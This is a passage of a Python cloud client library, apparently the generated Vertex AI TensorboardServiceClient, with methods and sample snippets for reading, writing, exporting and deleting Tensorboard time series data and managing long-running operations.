Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ListTensorboardTimeSeriesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.ListTensorboardTimeSeriesRequest
):
request = tensorboard_service.ListTensorboardTimeSeriesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.list_tensorboard_time_series
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListTensorboardTimeSeriesPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
def delete_tensorboard_time_series(
self,
request: Optional[
Union[tensorboard_service.DeleteTensorboardTimeSeriesRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gac_operation.Operation:
r"""Deletes a TensorboardTimeSeries.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_delete_tensorboard_time_series():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.DeleteTensorboardTimeSeriesRequest(
name="name_value",
)
# Make the request
operation = client.delete_tensorboard_time_series(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.DeleteTensorboardTimeSeriesRequest, dict]):
The request object. Request message for
[TensorboardService.DeleteTensorboardTimeSeries][google.cloud.aiplatform.v1.TensorboardService.DeleteTensorboardTimeSeries].
name (str):
Required. The name of the TensorboardTimeSeries to be
deleted. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}/timeSeries/{time_series}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
                The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty`, a generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.DeleteTensorboardTimeSeriesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.DeleteTensorboardTimeSeriesRequest
):
request = tensorboard_service.DeleteTensorboardTimeSeriesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.delete_tensorboard_time_series
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = gac_operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=gca_operation.DeleteOperationMetadata,
)
# Done; return the response.
return response
def batch_read_tensorboard_time_series_data(
self,
request: Optional[
Union[tensorboard_service.BatchReadTensorboardTimeSeriesDataRequest, dict]
] = None,
*,
tensorboard: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_service.BatchReadTensorboardTimeSeriesDataResponse:
r"""Reads multiple TensorboardTimeSeries' data. The data
point number limit is 1000 for scalars, 100 for tensors
and blob references. If the number of data points stored
is less than the limit, all data is returned. Otherwise,
the number limit of data points is randomly selected
from this time series and returned.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_batch_read_tensorboard_time_series_data():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.BatchReadTensorboardTimeSeriesDataRequest(
tensorboard="tensorboard_value",
time_series=['time_series_value1', 'time_series_value2'],
)
# Make the request
response = client.batch_read_tensorboard_time_series_data(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.BatchReadTensorboardTimeSeriesDataRequest, dict]):
The request object. Request message for
[TensorboardService.BatchReadTensorboardTimeSeriesData][google.cloud.aiplatform.v1.TensorboardService.BatchReadTensorboardTimeSeriesData].
tensorboard (str):
Required. The resource name of the Tensorboard
containing TensorboardTimeSeries to read data from.
Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}``.
The TensorboardTimeSeries referenced by
[time_series][google.cloud.aiplatform.v1.BatchReadTensorboardTimeSeriesDataRequest.time_series]
must be sub resources of this Tensorboard.
This corresponds to the ``tensorboard`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.BatchReadTensorboardTimeSeriesDataResponse:
Response message for
[TensorboardService.BatchReadTensorboardTimeSeriesData][google.cloud.aiplatform.v1.TensorboardService.BatchReadTensorboardTimeSeriesData].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.BatchReadTensorboardTimeSeriesDataRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.BatchReadTensorboardTimeSeriesDataRequest
):
request = tensorboard_service.BatchReadTensorboardTimeSeriesDataRequest(
request
)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard is not None:
request.tensorboard = tensorboard
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.batch_read_tensorboard_time_series_data
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard", request.tensorboard),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def read_tensorboard_time_series_data(
self,
request: Optional[
Union[tensorboard_service.ReadTensorboardTimeSeriesDataRequest, dict]
] = None,
*,
tensorboard_time_series: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_service.ReadTensorboardTimeSeriesDataResponse:
r"""Reads a TensorboardTimeSeries' data. By default, if the number
of data points stored is less than 1000, all data is returned.
Otherwise, 1000 data points is randomly selected from this time
series and returned. This value can be changed by changing
max_data_points, which can't be greater than 10k.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_read_tensorboard_time_series_data():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ReadTensorboardTimeSeriesDataRequest(
tensorboard_time_series="tensorboard_time_series_value",
)
# Make the request
response = client.read_tensorboard_time_series_data(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ReadTensorboardTimeSeriesDataRequest, dict]):
The request object. Request message for
[TensorboardService.ReadTensorboardTimeSeriesData][google.cloud.aiplatform.v1.TensorboardService.ReadTensorboardTimeSeriesData].
tensorboard_time_series (str):
Required. The resource name of the TensorboardTimeSeries
to read data from. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}/timeSeries/{time_series}``
This corresponds to the ``tensorboard_time_series`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.ReadTensorboardTimeSeriesDataResponse:
Response message for
[TensorboardService.ReadTensorboardTimeSeriesData][google.cloud.aiplatform.v1.TensorboardService.ReadTensorboardTimeSeriesData].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard_time_series])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ReadTensorboardTimeSeriesDataRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.ReadTensorboardTimeSeriesDataRequest
):
request = tensorboard_service.ReadTensorboardTimeSeriesDataRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard_time_series is not None:
request.tensorboard_time_series = tensorboard_time_series
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.read_tensorboard_time_series_data
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard_time_series", request.tensorboard_time_series),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def read_tensorboard_blob_data(
self,
request: Optional[
Union[tensorboard_service.ReadTensorboardBlobDataRequest, dict]
] = None,
*,
time_series: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> Iterable[tensorboard_service.ReadTensorboardBlobDataResponse]:
r"""Gets bytes of TensorboardBlobs.
This is to allow reading blob data stored in consumer
project's Cloud Storage bucket without users having to
obtain Cloud Storage access permission.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_read_tensorboard_blob_data():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ReadTensorboardBlobDataRequest(
time_series="time_series_value",
)
# Make the request
stream = client.read_tensorboard_blob_data(request=request)
# Handle the response
for response in stream:
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ReadTensorboardBlobDataRequest, dict]):
The request object. Request message for
[TensorboardService.ReadTensorboardBlobData][google.cloud.aiplatform.v1.TensorboardService.ReadTensorboardBlobData].
time_series (str):
                Required. The resource name of the TensorboardTimeSeries
                to list Blobs from. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}/timeSeries/{time_series}``
This corresponds to the ``time_series`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
Iterable[google.cloud.aiplatform_v1.types.ReadTensorboardBlobDataResponse]:
Response message for
[TensorboardService.ReadTensorboardBlobData][google.cloud.aiplatform.v1.TensorboardService.ReadTensorboardBlobData].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([time_series])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ReadTensorboardBlobDataRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.ReadTensorboardBlobDataRequest):
request = tensorboard_service.ReadTensorboardBlobDataRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if time_series is not None:
request.time_series = time_series
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.read_tensorboard_blob_data
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("time_series", request.time_series),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def write_tensorboard_experiment_data(
self,
request: Optional[
Union[tensorboard_service.WriteTensorboardExperimentDataRequest, dict]
] = None,
*,
tensorboard_experiment: Optional[str] = None,
write_run_data_requests: Optional[
MutableSequence[tensorboard_service.WriteTensorboardRunDataRequest]
] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_service.WriteTensorboardExperimentDataResponse:
r"""Write time series data points of multiple
TensorboardTimeSeries in multiple TensorboardRun's. If
any data fail to be ingested, an error is returned.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_write_tensorboard_experiment_data():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
write_run_data_requests = aiplatform_v1.WriteTensorboardRunDataRequest()
write_run_data_requests.tensorboard_run = "tensorboard_run_value"
write_run_data_requests.time_series_data.tensorboard_time_series_id = "tensorboard_time_series_id_value"
write_run_data_requests.time_series_data.value_type = "BLOB_SEQUENCE"
request = aiplatform_v1.WriteTensorboardExperimentDataRequest(
tensorboard_experiment="tensorboard_experiment_value",
write_run_data_requests=write_run_data_requests,
)
# Make the request
response = client.write_tensorboard_experiment_data(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.WriteTensorboardExperimentDataRequest, dict]):
The request object. Request message for
[TensorboardService.WriteTensorboardExperimentData][google.cloud.aiplatform.v1.TensorboardService.WriteTensorboardExperimentData].
tensorboard_experiment (str):
Required. The resource name of the TensorboardExperiment
to write data to. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}``
This corresponds to the ``tensorboard_experiment`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
write_run_data_requests (MutableSequence[google.cloud.aiplatform_v1.types.WriteTensorboardRunDataRequest]):
Required. Requests containing per-run
TensorboardTimeSeries data to write.
This corresponds to the ``write_run_data_requests`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.WriteTensorboardExperimentDataResponse:
Response message for
[TensorboardService.WriteTensorboardExperimentData][google.cloud.aiplatform.v1.TensorboardService.WriteTensorboardExperimentData].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard_experiment, write_run_data_requests])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.WriteTensorboardExperimentDataRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.WriteTensorboardExperimentDataRequest
):
request = tensorboard_service.WriteTensorboardExperimentDataRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard_experiment is not None:
request.tensorboard_experiment = tensorboard_experiment
if write_run_data_requests is not None:
request.write_run_data_requests = write_run_data_requests
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.write_tensorboard_experiment_data
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard_experiment", request.tensorboard_experiment),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def write_tensorboard_run_data(
self,
request: Optional[
Union[tensorboard_service.WriteTensorboardRunDataRequest, dict]
] = None,
*,
tensorboard_run: Optional[str] = None,
time_series_data: Optional[
MutableSequence[tensorboard_data.TimeSeriesData]
] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_service.WriteTensorboardRunDataResponse:
r"""Write time series data points into multiple
TensorboardTimeSeries under a TensorboardRun. If any
data fail to be ingested, an error is returned.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_write_tensorboard_run_data():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
time_series_data = aiplatform_v1.TimeSeriesData()
time_series_data.tensorboard_time_series_id = "tensorboard_time_series_id_value"
time_series_data.value_type = "BLOB_SEQUENCE"
request = aiplatform_v1.WriteTensorboardRunDataRequest(
tensorboard_run="tensorboard_run_value",
time_series_data=time_series_data,
)
# Make the request
response = client.write_tensorboard_run_data(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.WriteTensorboardRunDataRequest, dict]):
The request object. Request message for
[TensorboardService.WriteTensorboardRunData][google.cloud.aiplatform.v1.TensorboardService.WriteTensorboardRunData].
tensorboard_run (str):
Required. The resource name of the TensorboardRun to
write data to. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}``
This corresponds to the ``tensorboard_run`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
time_series_data (MutableSequence[google.cloud.aiplatform_v1.types.TimeSeriesData]):
Required. The TensorboardTimeSeries
                data to write. Values within a time
series are indexed by their step value.
Repeated writes to the same step will
overwrite the existing value for that
step.
The upper limit of data points per write
request is 5000.
This corresponds to the ``time_series_data`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.WriteTensorboardRunDataResponse:
Response message for
[TensorboardService.WriteTensorboardRunData][google.cloud.aiplatform.v1.TensorboardService.WriteTensorboardRunData].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard_run, time_series_data])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.WriteTensorboardRunDataRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.WriteTensorboardRunDataRequest):
request = tensorboard_service.WriteTensorboardRunDataRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard_run is not None:
request.tensorboard_run = tensorboard_run
if time_series_data is not None:
request.time_series_data = time_series_data
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.write_tensorboard_run_data
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard_run", request.tensorboard_run),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def export_tensorboard_time_series_data(
self,
request: Optional[
Union[tensorboard_service.ExportTensorboardTimeSeriesDataRequest, dict]
] = None,
*,
tensorboard_time_series: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ExportTensorboardTimeSeriesDataPager:
r"""Exports a TensorboardTimeSeries' data. Data is
returned in paginated responses.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_export_tensorboard_time_series_data():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ExportTensorboardTimeSeriesDataRequest(
tensorboard_time_series="tensorboard_time_series_value",
)
# Make the request
page_result = client.export_tensorboard_time_series_data(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ExportTensorboardTimeSeriesDataRequest, dict]):
The request object. Request message for
[TensorboardService.ExportTensorboardTimeSeriesData][google.cloud.aiplatform.v1.TensorboardService.ExportTensorboardTimeSeriesData].
tensorboard_time_series (str):
Required. The resource name of the TensorboardTimeSeries
to export data from. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}/timeSeries/{time_series}``
This corresponds to the ``tensorboard_time_series`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.services.tensorboard_service.pagers.ExportTensorboardTimeSeriesDataPager:
Response message for
[TensorboardService.ExportTensorboardTimeSeriesData][google.cloud.aiplatform.v1.TensorboardService.ExportTensorboardTimeSeriesData].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard_time_series])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ExportTensorboardTimeSeriesDataRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.ExportTensorboardTimeSeriesDataRequest
):
request = tensorboard_service.ExportTensorboardTimeSeriesDataRequest(
request
)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard_time_series is not None:
request.tensorboard_time_series = tensorboard_time_series
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.export_tensorboard_time_series_data
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard_time_series", request.tensorboard_time_series),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ExportTensorboardTimeSeriesDataPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
def __enter__(self) -> "TensorboardServiceClient":
return self
def __exit__(self, type, value, traceback):
"""Releases underlying transport's resources.
.. warning::
ONLY use as a context manager if the transport is NOT shared
with other clients! Exiting the with block will CLOSE the transport
and may cause errors in other clients!
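        A minimal hand-written sketch of context-manager usage with a
        dedicated (unshared) client; the resource name is a placeholder:
        .. code-block:: python
            from google.cloud import aiplatform_v1
            def sample_context_manager():
                # The transport is closed automatically when the block exits
                with aiplatform_v1.TensorboardServiceClient() as client:
                    response = client.get_tensorboard_time_series(
                        request={"name": "name_value"}
                    )
                    print(response)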
"""
self.transport.close()
def list_operations(
self,
request: Optional[operations_pb2.ListOperationsRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operations_pb2.ListOperationsResponse:
r"""Lists operations that match the specified filter in the request.
Args:
request (:class:`~.operations_pb2.ListOperationsRequest`):
The request object. Request message for
`ListOperations` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.operations_pb2.ListOperationsResponse:
Response message for ``ListOperations`` method.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.ListOperationsRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.list_operations,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def get_operation(
self,
request: Optional[operations_pb2.GetOperationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operations_pb2.Operation:
r"""Gets the latest state of a long-running operation.
Args:
request (:class:`~.operations_pb2.GetOperationRequest`):
The request object. Request message for
`GetOperation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.operations_pb2.Operation:
An ``Operation`` object.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.GetOperationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.get_operation,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def delete_operation(
self,
request: Optional[operations_pb2.DeleteOperationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes a long-running operation.
This method indicates that the client is no longer interested
in the operation result. It does not cancel the operation.
If the server doesn't support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`.
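        A minimal hand-written usage sketch (not a generated sample; the
        operation name below is a placeholder):
        .. code-block:: python
            from google.cloud import aiplatform_v1
            from google.longrunning import operations_pb2
            def sample_delete_operation():
                # Create a client
                client = aiplatform_v1.TensorboardServiceClient()
                # Initialize request argument(s)
                request = operations_pb2.DeleteOperationRequest(
                    name="name_value",
                )
                # Make the request; this method returns None on success
                client.delete_operation(request=request)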
Args:
request (:class:`~.operations_pb2.DeleteOperationRequest`):
The request object. Request message for
`DeleteOperation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
None
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.DeleteOperationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.delete_operation,
default_timeout=None,
